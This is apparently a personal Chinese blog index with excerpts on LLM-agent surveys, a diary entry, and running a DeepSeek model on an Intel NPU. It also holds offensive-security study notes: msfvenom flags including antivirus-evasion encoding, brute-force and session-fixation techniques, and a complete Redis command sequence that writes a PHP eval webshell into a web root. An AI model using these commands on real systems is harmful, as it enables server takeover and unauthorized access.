2402.01680v

Abstract

大语言模型 (LLM) 在广泛的领域中取得了显著的成功, 展现出出色的规划和推理能力, 已经被用作自动执行许多任务的自主智能体. 近来, 基于使用一个 LLM 作为单一规划或决策智能体的发展, 基于 LLM 的多智能体系统在解决复杂问题和世界模拟方面取得了可观的进展. 为了给社区提供一个这个动态领域的概述, 本文深入讨论了基于 LLM 的多智能体系统的基本点和挑战. 本文主要聚焦于如下问题: 基于 LLM 的多智能体可以模拟哪些领域和环境? 这些智能体如何成形, 如何沟通? 智能体能力的提升用到了哪些机制?

阅读全文 »

今天把老师让看的两篇 survey 其一看完了, 结果记笔记记了将近六千字, 而且一大半是在抄翻译, 而且一个重要动力是写完了能发博客上, 感觉我已经堕落成五颜六色荧光笔胶带便利贴学习博主了.

周三就又开组会了, 时间稍微有点紧. 这还没怎么开始已经感受到压力了. 唉. 回到住处没干什么又快十一点了, 感觉很难再抽大段时间打游戏或者画画了.

晚上下班看到公司门口有只橘猫在挠痒痒, 心情好了很多, 看来以后还是得养猫.

折腾了一下给博客换了个英文字体, 虽然影响不大不过感觉舒服了不少.

s11704-024-40231-1

Abstract

传统智能体训练方式一般侧重于在孤立环境中基于有限知识训练, 这与人类的学习过程有显著差别, 也导致智能体难以做出类似人类的决策. 近来, LLM 展示出了达到类人智能的潜力, 导致基于 LLM 的智能体研究数量激增. 本文对这些研究进行了全面调查, 给出了对基于 LLM 的智能体的系统回顾.

本文讨论了基于 LLM 的智能体的构建, 给出了一个统一框架, 概述了智能体在研究中的应用, 并研究了对其常用的评估策略, 提出了该领域的几个挑战和未来方向.

阅读全文 »

DeepSeek-R1-Distill-Qwen-1.5B

DeepSeek-R1-Distill-Qwen-1.5B 是 DeepSeek 第一代大模型之一, 基于 Qwen 架构, 经过知识蒸馏, 参数量约为 15 亿, 轻量化, 资源占用低, 中文适配优秀, 运行快.

为使用 Intel NPU 加速库运行该模型, 首先从 ModelScope 下载所需模型, 导入所需依赖库.

import intel_npu_acceleration_library
from modelscope import AutoModelForCausalLM, AutoTokenizer
from transformers import TextStreamer
import torch
import os
import time

随后设置模型基础参数.

model_name = r'deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B'
dtype = "float16"
filepath = os.path.join("models", model_name)
filename = os.path.join(filepath, dtype, "model.bin")
os.makedirs(os.path.join(filepath, dtype), exist_ok=True)

根据 NPU 支持的数据类型, 指定dtypefloat16.

阅读全文 »

Msfvenom

常用参数

-p 指定 payload
-f 指定输出格式
-e 指定使用的 encoder 编码免杀
-a 指定 payload 的目标架构
-o 保存 payload 文件输出
-b 设定规避字符集
-n 为 payload 预先指定一个 NOP 滑动长度
-s 设定有效攻击载荷的最大长度(文件大小)
-i 指定 payload 的编码次数
-c 指定一个附加的 win32 shellcode 文件
-x 指定一个自定义的可执行文件作为模板
-k 保护模板程序的动作,payload 作为新的进程运行
-v 指定一个自定义的变量,以确定输出格式

阅读全文 »

逻辑漏洞,指开发人员设计程序时逻辑不严密,导致攻击者可以修改、绕过或中断整个程序,让程序按开发者预料之外的方式执行。

身份验证漏洞

验证码爆破:pkav

暴力破解漏洞:bp intruder
限制 IP 爆破:代理池
限制密码错误次数:弱密码爆破账户
多字段爆破:bp grep 或自己写脚本

Authorization 爆破:编码后的用户名与密码爆破

未授权漏洞:
session:
利用服务器的 session 不变机制,借他人之手获得认证和授权并冒充他人
漏洞原理:请求登录过程中 URL 带有 session,发送带有 session 的 URL 给相关人员诱导其登录获取身份信息
cookie:
cookie 中有明文或只是简单编码,伪造 cookie 信息

未进行登录凭证验证:直接访问后台

阅读全文 »

Redis 常见用途

Remote Dictionary Service

  • 缓存
  • 分布式 session, 分布式锁,分布式全局 ID
  • 计数器,限流
  • 列表
  • 抽奖
  • 标签
  • 排行榜

Redis 持久化

RDB: Redis DataBase (默认)
AOF: Append Only File

Webshell 提权

redis-cli -h example.com -p 6379
config set dir /www/admin/localhost_80/wwwroot
config set dbfilename redis.php
set x “<?php @eval($_POST[hajimi]): ?>”
save
阅读全文 »
0%